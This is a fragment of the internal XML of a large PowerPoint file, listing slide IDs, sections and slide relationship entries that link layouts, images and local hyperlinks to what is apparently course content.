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419" r:id="rId35"/>
    <p:sldId id="400" r:id="rId36"/>
    <p:sldId id="559" r:id="rId37"/>
    <p:sldId id="674" r:id="rId38"/>
    <p:sldId id="558" r:id="rId39"/>
    <p:sldId id="561" r:id="rId40"/>
    <p:sldId id="560" r:id="rId41"/>
    <p:sldId id="568" r:id="rId42"/>
    <p:sldId id="562" r:id="rId43"/>
    <p:sldId id="687" r:id="rId44"/>
    <p:sldId id="689" r:id="rId45"/>
    <p:sldId id="417" r:id="rId46"/>
    <p:sldId id="263" r:id="rId47"/>
    <p:sldId id="572" r:id="rId48"/>
    <p:sldId id="260" r:id="rId49"/>
    <p:sldId id="450" r:id="rId50"/>
    <p:sldId id="449" r:id="rId51"/>
    <p:sldId id="270" r:id="rId52"/>
    <p:sldId id="271" r:id="rId53"/>
    <p:sldId id="272" r:id="rId54"/>
    <p:sldId id="273" r:id="rId55"/>
    <p:sldId id="385" r:id="rId56"/>
    <p:sldId id="603" r:id="rId57"/>
    <p:sldId id="279" r:id="rId58"/>
    <p:sldId id="280" r:id="rId59"/>
    <p:sldId id="281" r:id="rId60"/>
    <p:sldId id="282" r:id="rId61"/>
    <p:sldId id="386" r:id="rId62"/>
    <p:sldId id="387" r:id="rId63"/>
    <p:sldId id="388" r:id="rId64"/>
    <p:sldId id="389" r:id="rId65"/>
    <p:sldId id="390" r:id="rId66"/>
    <p:sldId id="391" r:id="rId67"/>
    <p:sldId id="392" r:id="rId68"/>
    <p:sldId id="393" r:id="rId69"/>
    <p:sldId id="601" r:id="rId70"/>
    <p:sldId id="605" r:id="rId71"/>
    <p:sldId id="606" r:id="rId72"/>
    <p:sldId id="604" r:id="rId73"/>
    <p:sldId id="612" r:id="rId74"/>
    <p:sldId id="613" r:id="rId75"/>
    <p:sldId id="602" r:id="rId76"/>
    <p:sldId id="616" r:id="rId77"/>
    <p:sldId id="614" r:id="rId78"/>
    <p:sldId id="615" r:id="rId79"/>
    <p:sldId id="402" r:id="rId80"/>
    <p:sldId id="410" r:id="rId81"/>
    <p:sldId id="411" r:id="rId82"/>
    <p:sldId id="406" r:id="rId83"/>
    <p:sldId id="403" r:id="rId84"/>
    <p:sldId id="414" r:id="rId85"/>
    <p:sldId id="415" r:id="rId86"/>
    <p:sldId id="416" r:id="rId87"/>
    <p:sldId id="512" r:id="rId88"/>
    <p:sldId id="513" r:id="rId89"/>
    <p:sldId id="409" r:id="rId90"/>
    <p:sldId id="405" r:id="rId91"/>
    <p:sldId id="407" r:id="rId92"/>
    <p:sldId id="404" r:id="rId93"/>
    <p:sldId id="514" r:id="rId94"/>
    <p:sldId id="515" r:id="rId95"/>
    <p:sldId id="570" r:id="rId96"/>
    <p:sldId id="571" r:id="rId97"/>
    <p:sldId id="607" r:id="rId98"/>
    <p:sldId id="608" r:id="rId99"/>
    <p:sldId id="435" r:id="rId100"/>
    <p:sldId id="516" r:id="rId101"/>
    <p:sldId id="685" r:id="rId102"/>
    <p:sldId id="437" r:id="rId103"/>
    <p:sldId id="527" r:id="rId104"/>
    <p:sldId id="528" r:id="rId105"/>
    <p:sldId id="529" r:id="rId106"/>
    <p:sldId id="530" r:id="rId107"/>
    <p:sldId id="518" r:id="rId108"/>
    <p:sldId id="519" r:id="rId109"/>
    <p:sldId id="520" r:id="rId110"/>
    <p:sldId id="521" r:id="rId111"/>
    <p:sldId id="439" r:id="rId112"/>
    <p:sldId id="522" r:id="rId113"/>
    <p:sldId id="523" r:id="rId114"/>
    <p:sldId id="525" r:id="rId115"/>
    <p:sldId id="440" r:id="rId116"/>
    <p:sldId id="442" r:id="rId117"/>
    <p:sldId id="443" r:id="rId118"/>
    <p:sldId id="541" r:id="rId119"/>
    <p:sldId id="544" r:id="rId120"/>
    <p:sldId id="543" r:id="rId121"/>
    <p:sldId id="546" r:id="rId122"/>
    <p:sldId id="547" r:id="rId123"/>
    <p:sldId id="542" r:id="rId124"/>
    <p:sldId id="438" r:id="rId125"/>
    <p:sldId id="531" r:id="rId126"/>
    <p:sldId id="532" r:id="rId127"/>
    <p:sldId id="533" r:id="rId128"/>
    <p:sldId id="534" r:id="rId129"/>
    <p:sldId id="535" r:id="rId130"/>
    <p:sldId id="536" r:id="rId131"/>
    <p:sldId id="537" r:id="rId132"/>
    <p:sldId id="436" r:id="rId133"/>
    <p:sldId id="551" r:id="rId134"/>
    <p:sldId id="693" r:id="rId135"/>
    <p:sldId id="692" r:id="rId136"/>
    <p:sldId id="549" r:id="rId137"/>
    <p:sldId id="538" r:id="rId138"/>
    <p:sldId id="539" r:id="rId139"/>
    <p:sldId id="686" r:id="rId140"/>
    <p:sldId id="540" r:id="rId141"/>
    <p:sldId id="575" r:id="rId142"/>
    <p:sldId id="574" r:id="rId143"/>
    <p:sldId id="576" r:id="rId144"/>
    <p:sldId id="577" r:id="rId145"/>
    <p:sldId id="578" r:id="rId146"/>
    <p:sldId id="579" r:id="rId147"/>
    <p:sldId id="550" r:id="rId148"/>
    <p:sldId id="684" r:id="rId149"/>
    <p:sldId id="548" r:id="rId150"/>
    <p:sldId id="526" r:id="rId151"/>
    <p:sldId id="690" r:id="rId152"/>
    <p:sldId id="694" r:id="rId153"/>
    <p:sldId id="695" r:id="rId154"/>
    <p:sldId id="696" r:id="rId155"/>
    <p:sldId id="609" r:id="rId156"/>
    <p:sldId id="610" r:id="rId157"/>
    <p:sldId id="611" r:id="rId158"/>
    <p:sldId id="617" r:id="rId159"/>
    <p:sldId id="618" r:id="rId160"/>
    <p:sldId id="460" r:id="rId161"/>
    <p:sldId id="552" r:id="rId162"/>
    <p:sldId id="462" r:id="rId163"/>
    <p:sldId id="463" r:id="rId164"/>
    <p:sldId id="467" r:id="rId165"/>
    <p:sldId id="469" r:id="rId166"/>
    <p:sldId id="476" r:id="rId167"/>
    <p:sldId id="475" r:id="rId168"/>
    <p:sldId id="478" r:id="rId169"/>
    <p:sldId id="477" r:id="rId170"/>
    <p:sldId id="479" r:id="rId171"/>
    <p:sldId id="480" r:id="rId172"/>
    <p:sldId id="466" r:id="rId173"/>
    <p:sldId id="464" r:id="rId174"/>
    <p:sldId id="471" r:id="rId175"/>
    <p:sldId id="470" r:id="rId176"/>
    <p:sldId id="473" r:id="rId177"/>
    <p:sldId id="474" r:id="rId178"/>
    <p:sldId id="483" r:id="rId179"/>
    <p:sldId id="481" r:id="rId180"/>
    <p:sldId id="472" r:id="rId181"/>
    <p:sldId id="484" r:id="rId182"/>
    <p:sldId id="486" r:id="rId183"/>
    <p:sldId id="493" r:id="rId184"/>
    <p:sldId id="487" r:id="rId185"/>
    <p:sldId id="490" r:id="rId186"/>
    <p:sldId id="489" r:id="rId187"/>
    <p:sldId id="500" r:id="rId188"/>
    <p:sldId id="491" r:id="rId189"/>
    <p:sldId id="488" r:id="rId190"/>
    <p:sldId id="482" r:id="rId191"/>
    <p:sldId id="497" r:id="rId192"/>
    <p:sldId id="498" r:id="rId193"/>
    <p:sldId id="501" r:id="rId194"/>
    <p:sldId id="496" r:id="rId195"/>
    <p:sldId id="505" r:id="rId196"/>
    <p:sldId id="503" r:id="rId197"/>
    <p:sldId id="502" r:id="rId198"/>
    <p:sldId id="509" r:id="rId199"/>
    <p:sldId id="510" r:id="rId200"/>
    <p:sldId id="506" r:id="rId201"/>
    <p:sldId id="511" r:id="rId202"/>
    <p:sldId id="485" r:id="rId203"/>
    <p:sldId id="620" r:id="rId204"/>
    <p:sldId id="621" r:id="rId205"/>
    <p:sldId id="623" r:id="rId206"/>
    <p:sldId id="625" r:id="rId207"/>
    <p:sldId id="622" r:id="rId208"/>
    <p:sldId id="627" r:id="rId209"/>
    <p:sldId id="626" r:id="rId210"/>
    <p:sldId id="669" r:id="rId211"/>
    <p:sldId id="670" r:id="rId212"/>
    <p:sldId id="671" r:id="rId213"/>
    <p:sldId id="675" r:id="rId214"/>
    <p:sldId id="664" r:id="rId215"/>
    <p:sldId id="665" r:id="rId216"/>
    <p:sldId id="666" r:id="rId217"/>
    <p:sldId id="667" r:id="rId218"/>
    <p:sldId id="668" r:id="rId219"/>
    <p:sldId id="660" r:id="rId220"/>
    <p:sldId id="659" r:id="rId221"/>
    <p:sldId id="658" r:id="rId222"/>
    <p:sldId id="661" r:id="rId223"/>
    <p:sldId id="663" r:id="rId224"/>
    <p:sldId id="648" r:id="rId225"/>
    <p:sldId id="647" r:id="rId226"/>
    <p:sldId id="649" r:id="rId227"/>
    <p:sldId id="650" r:id="rId228"/>
    <p:sldId id="651" r:id="rId229"/>
    <p:sldId id="652" r:id="rId230"/>
    <p:sldId id="653" r:id="rId231"/>
    <p:sldId id="654" r:id="rId232"/>
    <p:sldId id="656" r:id="rId233"/>
    <p:sldId id="655" r:id="rId234"/>
    <p:sldId id="657" r:id="rId235"/>
    <p:sldId id="744" r:id="rId236"/>
    <p:sldId id="742" r:id="rId237"/>
    <p:sldId id="745" r:id="rId238"/>
    <p:sldId id="746" r:id="rId239"/>
    <p:sldId id="743" r:id="rId240"/>
    <p:sldId id="749" r:id="rId241"/>
    <p:sldId id="748" r:id="rId242"/>
    <p:sldId id="747" r:id="rId243"/>
    <p:sldId id="750" r:id="rId244"/>
    <p:sldId id="284" r:id="rId245"/>
    <p:sldId id="285" r:id="rId246"/>
    <p:sldId id="286" r:id="rId247"/>
    <p:sldId id="355" r:id="rId248"/>
    <p:sldId id="291" r:id="rId249"/>
    <p:sldId id="288" r:id="rId250"/>
    <p:sldId id="292" r:id="rId251"/>
    <p:sldId id="293" r:id="rId252"/>
    <p:sldId id="294" r:id="rId253"/>
    <p:sldId id="297" r:id="rId254"/>
    <p:sldId id="298" r:id="rId255"/>
    <p:sldId id="299" r:id="rId256"/>
    <p:sldId id="300" r:id="rId257"/>
    <p:sldId id="301" r:id="rId258"/>
    <p:sldId id="302" r:id="rId259"/>
    <p:sldId id="303" r:id="rId260"/>
    <p:sldId id="304" r:id="rId261"/>
    <p:sldId id="553" r:id="rId262"/>
    <p:sldId id="554" r:id="rId263"/>
    <p:sldId id="305" r:id="rId264"/>
    <p:sldId id="306" r:id="rId265"/>
    <p:sldId id="555" r:id="rId266"/>
    <p:sldId id="557" r:id="rId267"/>
    <p:sldId id="556" r:id="rId268"/>
    <p:sldId id="307" r:id="rId269"/>
    <p:sldId id="308" r:id="rId270"/>
    <p:sldId id="309" r:id="rId271"/>
    <p:sldId id="310" r:id="rId272"/>
    <p:sldId id="315" r:id="rId273"/>
    <p:sldId id="316" r:id="rId274"/>
    <p:sldId id="317" r:id="rId275"/>
    <p:sldId id="311" r:id="rId276"/>
    <p:sldId id="312" r:id="rId277"/>
    <p:sldId id="313" r:id="rId278"/>
    <p:sldId id="314" r:id="rId279"/>
    <p:sldId id="318" r:id="rId280"/>
    <p:sldId id="319" r:id="rId281"/>
    <p:sldId id="320" r:id="rId282"/>
    <p:sldId id="321" r:id="rId283"/>
    <p:sldId id="322" r:id="rId284"/>
    <p:sldId id="323" r:id="rId285"/>
    <p:sldId id="324" r:id="rId286"/>
    <p:sldId id="326" r:id="rId287"/>
    <p:sldId id="327" r:id="rId288"/>
    <p:sldId id="328" r:id="rId289"/>
    <p:sldId id="329" r:id="rId290"/>
    <p:sldId id="330" r:id="rId291"/>
    <p:sldId id="331" r:id="rId292"/>
    <p:sldId id="332" r:id="rId293"/>
    <p:sldId id="333" r:id="rId294"/>
    <p:sldId id="334" r:id="rId295"/>
    <p:sldId id="335" r:id="rId296"/>
    <p:sldId id="336" r:id="rId297"/>
    <p:sldId id="337" r:id="rId298"/>
    <p:sldId id="338" r:id="rId299"/>
    <p:sldId id="339" r:id="rId300"/>
    <p:sldId id="340" r:id="rId301"/>
    <p:sldId id="341" r:id="rId302"/>
    <p:sldId id="342" r:id="rId303"/>
    <p:sldId id="343" r:id="rId304"/>
    <p:sldId id="344" r:id="rId305"/>
    <p:sldId id="345" r:id="rId306"/>
    <p:sldId id="346" r:id="rId307"/>
    <p:sldId id="347" r:id="rId308"/>
    <p:sldId id="348" r:id="rId309"/>
    <p:sldId id="349" r:id="rId310"/>
    <p:sldId id="350" r:id="rId311"/>
    <p:sldId id="351" r:id="rId312"/>
    <p:sldId id="352" r:id="rId313"/>
    <p:sldId id="353" r:id="rId314"/>
    <p:sldId id="354" r:id="rId315"/>
    <p:sldId id="356" r:id="rId316"/>
    <p:sldId id="357" r:id="rId317"/>
    <p:sldId id="358" r:id="rId318"/>
    <p:sldId id="359" r:id="rId319"/>
    <p:sldId id="360" r:id="rId320"/>
    <p:sldId id="580" r:id="rId321"/>
    <p:sldId id="619" r:id="rId322"/>
    <p:sldId id="581" r:id="rId323"/>
    <p:sldId id="582" r:id="rId324"/>
    <p:sldId id="631" r:id="rId325"/>
    <p:sldId id="628" r:id="rId326"/>
    <p:sldId id="629" r:id="rId327"/>
    <p:sldId id="630" r:id="rId328"/>
    <p:sldId id="697" r:id="rId329"/>
    <p:sldId id="699" r:id="rId330"/>
    <p:sldId id="700" r:id="rId331"/>
    <p:sldId id="698" r:id="rId332"/>
    <p:sldId id="632" r:id="rId333"/>
    <p:sldId id="702" r:id="rId334"/>
    <p:sldId id="703" r:id="rId335"/>
    <p:sldId id="707" r:id="rId336"/>
    <p:sldId id="701" r:id="rId337"/>
    <p:sldId id="633" r:id="rId338"/>
    <p:sldId id="634" r:id="rId339"/>
    <p:sldId id="708" r:id="rId340"/>
    <p:sldId id="704" r:id="rId341"/>
    <p:sldId id="705" r:id="rId342"/>
    <p:sldId id="706" r:id="rId343"/>
    <p:sldId id="710" r:id="rId344"/>
    <p:sldId id="711" r:id="rId345"/>
    <p:sldId id="712" r:id="rId346"/>
    <p:sldId id="709" r:id="rId347"/>
    <p:sldId id="713" r:id="rId348"/>
    <p:sldId id="714" r:id="rId349"/>
    <p:sldId id="729" r:id="rId350"/>
    <p:sldId id="728" r:id="rId351"/>
    <p:sldId id="731" r:id="rId352"/>
    <p:sldId id="727" r:id="rId353"/>
    <p:sldId id="730" r:id="rId354"/>
    <p:sldId id="732" r:id="rId355"/>
    <p:sldId id="733" r:id="rId356"/>
    <p:sldId id="734" r:id="rId357"/>
    <p:sldId id="737" r:id="rId358"/>
    <p:sldId id="738" r:id="rId359"/>
    <p:sldId id="739" r:id="rId360"/>
    <p:sldId id="736" r:id="rId361"/>
    <p:sldId id="735" r:id="rId362"/>
    <p:sldId id="740" r:id="rId363"/>
    <p:sldId id="741" r:id="rId364"/>
    <p:sldId id="718" r:id="rId365"/>
    <p:sldId id="720" r:id="rId366"/>
    <p:sldId id="721" r:id="rId367"/>
    <p:sldId id="723" r:id="rId368"/>
    <p:sldId id="719" r:id="rId369"/>
    <p:sldId id="715" r:id="rId370"/>
    <p:sldId id="716" r:id="rId371"/>
    <p:sldId id="717" r:id="rId372"/>
    <p:sldId id="724" r:id="rId373"/>
    <p:sldId id="725" r:id="rId374"/>
    <p:sldId id="361" r:id="rId375"/>
    <p:sldId id="362" r:id="rId376"/>
    <p:sldId id="363" r:id="rId377"/>
    <p:sldId id="364" r:id="rId378"/>
    <p:sldId id="635" r:id="rId379"/>
    <p:sldId id="638" r:id="rId380"/>
    <p:sldId id="641" r:id="rId381"/>
    <p:sldId id="639" r:id="rId382"/>
    <p:sldId id="640" r:id="rId383"/>
    <p:sldId id="644" r:id="rId384"/>
    <p:sldId id="646" r:id="rId385"/>
    <p:sldId id="673" r:id="rId386"/>
    <p:sldId id="677" r:id="rId387"/>
    <p:sldId id="678" r:id="rId388"/>
    <p:sldId id="645" r:id="rId389"/>
    <p:sldId id="642" r:id="rId390"/>
    <p:sldId id="643" r:id="rId391"/>
    <p:sldId id="683" r:id="rId392"/>
    <p:sldId id="679" r:id="rId393"/>
    <p:sldId id="680" r:id="rId394"/>
    <p:sldId id="681" r:id="rId395"/>
    <p:sldId id="682" r:id="rId396"/>
    <p:sldId id="432" r:id="rId397"/>
    <p:sldId id="433" r:id="rId398"/>
    <p:sldId id="434" r:id="rId399"/>
    <p:sldId id="423" r:id="rId400"/>
    <p:sldId id="563" r:id="rId401"/>
    <p:sldId id="592" r:id="rId402"/>
    <p:sldId id="564" r:id="rId403"/>
    <p:sldId id="565" r:id="rId404"/>
    <p:sldId id="586" r:id="rId405"/>
    <p:sldId id="587" r:id="rId406"/>
    <p:sldId id="588" r:id="rId407"/>
    <p:sldId id="589" r:id="rId408"/>
    <p:sldId id="590" r:id="rId409"/>
    <p:sldId id="591" r:id="rId410"/>
    <p:sldId id="593" r:id="rId411"/>
    <p:sldId id="594" r:id="rId412"/>
    <p:sldId id="595" r:id="rId413"/>
    <p:sldId id="596" r:id="rId414"/>
    <p:sldId id="597" r:id="rId415"/>
    <p:sldId id="598" r:id="rId416"/>
    <p:sldId id="599" r:id="rId417"/>
    <p:sldId id="600" r:id="rId418"/>
    <p:sldId id="583" r:id="rId419"/>
    <p:sldId id="584" r:id="rId420"/>
    <p:sldId id="585" r:id="rId421"/>
    <p:sldId id="566" r:id="rId422"/>
    <p:sldId id="268" r:id="rId423"/>
    <p:sldId id="365" r:id="rId424"/>
    <p:sldId id="366" r:id="rId425"/>
    <p:sldId id="507" r:id="rId426"/>
    <p:sldId id="296" r:id="rId427"/>
    <p:sldId id="290" r:id="rId42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674"/>
            <p14:sldId id="558"/>
            <p14:sldId id="561"/>
            <p14:sldId id="560"/>
            <p14:sldId id="568"/>
            <p14:sldId id="562"/>
            <p14:sldId id="687"/>
            <p14:sldId id="689"/>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693"/>
            <p14:sldId id="692"/>
            <p14:sldId id="549"/>
            <p14:sldId id="538"/>
            <p14:sldId id="539"/>
            <p14:sldId id="686"/>
            <p14:sldId id="540"/>
            <p14:sldId id="575"/>
            <p14:sldId id="574"/>
            <p14:sldId id="576"/>
            <p14:sldId id="577"/>
            <p14:sldId id="578"/>
            <p14:sldId id="579"/>
            <p14:sldId id="550"/>
            <p14:sldId id="684"/>
            <p14:sldId id="548"/>
            <p14:sldId id="526"/>
            <p14:sldId id="690"/>
            <p14:sldId id="694"/>
            <p14:sldId id="695"/>
            <p14:sldId id="69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69"/>
            <p14:sldId id="670"/>
            <p14:sldId id="671"/>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744"/>
            <p14:sldId id="742"/>
            <p14:sldId id="745"/>
            <p14:sldId id="746"/>
            <p14:sldId id="743"/>
            <p14:sldId id="749"/>
            <p14:sldId id="748"/>
            <p14:sldId id="747"/>
            <p14:sldId id="750"/>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97"/>
            <p14:sldId id="699"/>
            <p14:sldId id="700"/>
            <p14:sldId id="698"/>
            <p14:sldId id="632"/>
            <p14:sldId id="702"/>
            <p14:sldId id="703"/>
            <p14:sldId id="707"/>
            <p14:sldId id="701"/>
            <p14:sldId id="633"/>
            <p14:sldId id="634"/>
            <p14:sldId id="708"/>
            <p14:sldId id="704"/>
            <p14:sldId id="705"/>
            <p14:sldId id="706"/>
            <p14:sldId id="710"/>
            <p14:sldId id="711"/>
            <p14:sldId id="712"/>
            <p14:sldId id="709"/>
            <p14:sldId id="713"/>
            <p14:sldId id="714"/>
            <p14:sldId id="729"/>
            <p14:sldId id="728"/>
            <p14:sldId id="731"/>
            <p14:sldId id="727"/>
            <p14:sldId id="730"/>
            <p14:sldId id="732"/>
            <p14:sldId id="733"/>
            <p14:sldId id="734"/>
            <p14:sldId id="737"/>
            <p14:sldId id="738"/>
            <p14:sldId id="739"/>
            <p14:sldId id="736"/>
            <p14:sldId id="735"/>
            <p14:sldId id="740"/>
            <p14:sldId id="741"/>
            <p14:sldId id="718"/>
            <p14:sldId id="720"/>
            <p14:sldId id="721"/>
            <p14:sldId id="723"/>
            <p14:sldId id="719"/>
            <p14:sldId id="715"/>
            <p14:sldId id="716"/>
            <p14:sldId id="717"/>
            <p14:sldId id="724"/>
            <p14:sldId id="725"/>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682"/>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117" d="100"/>
          <a:sy n="117" d="100"/>
        </p:scale>
        <p:origin x="96"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tableStyles" Target="tableStyles.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commentAuthors" Target="commentAuthors.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster1.xml"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2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2021-06-07</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2021-06-07</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2021-06-07</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2021-06-07</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2021-06-07</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2021-06-07</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2021-06-07</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2021-06-07</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2021-06-07</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2021-06-07</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2021-06-07</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2021-06-07</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422.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide100.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 Target="slide99.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image120.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide103.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108.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide104.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 Target="slide294.xm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106.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29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108.jpeg"/><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9.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><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slide" Target="slide99.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422.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108.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide113.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4.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29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1.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide99.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image131.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide117.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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide294.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119.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2.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22.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2.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3.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422.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide125.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110.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-70.html" TargetMode="Externa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108.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide126.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 Target="slide99.xm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128.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7.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide99.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139.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image138.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13.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slide" Target="slide99.xml"/><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143.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image142.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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4.jpe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422.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide132.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide151.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide134.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide46.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide133.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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image145.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13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2.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36.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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image147.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide137.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-72.html" TargetMode="External"/><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108.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide138.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46.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide139.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2.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4.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2.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108.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14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2.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46.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2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22.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14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108.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide15.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2.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2.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153.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2.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5.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide15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2.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hyperlink" Target="../Content/ItCS/Block/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide155.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163.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62.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image161.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide162.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.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166.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image165.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide164.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-55.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169.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image168.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide166.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slide" Target="slide422.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422.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image171.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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17.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slide" Target="slide422.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422.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image174.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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173.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-56.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4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-59.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178.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image177.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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181.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image180.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide177.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17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185.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image184.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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8.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188.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image187.png"/></Relationships>
</file>

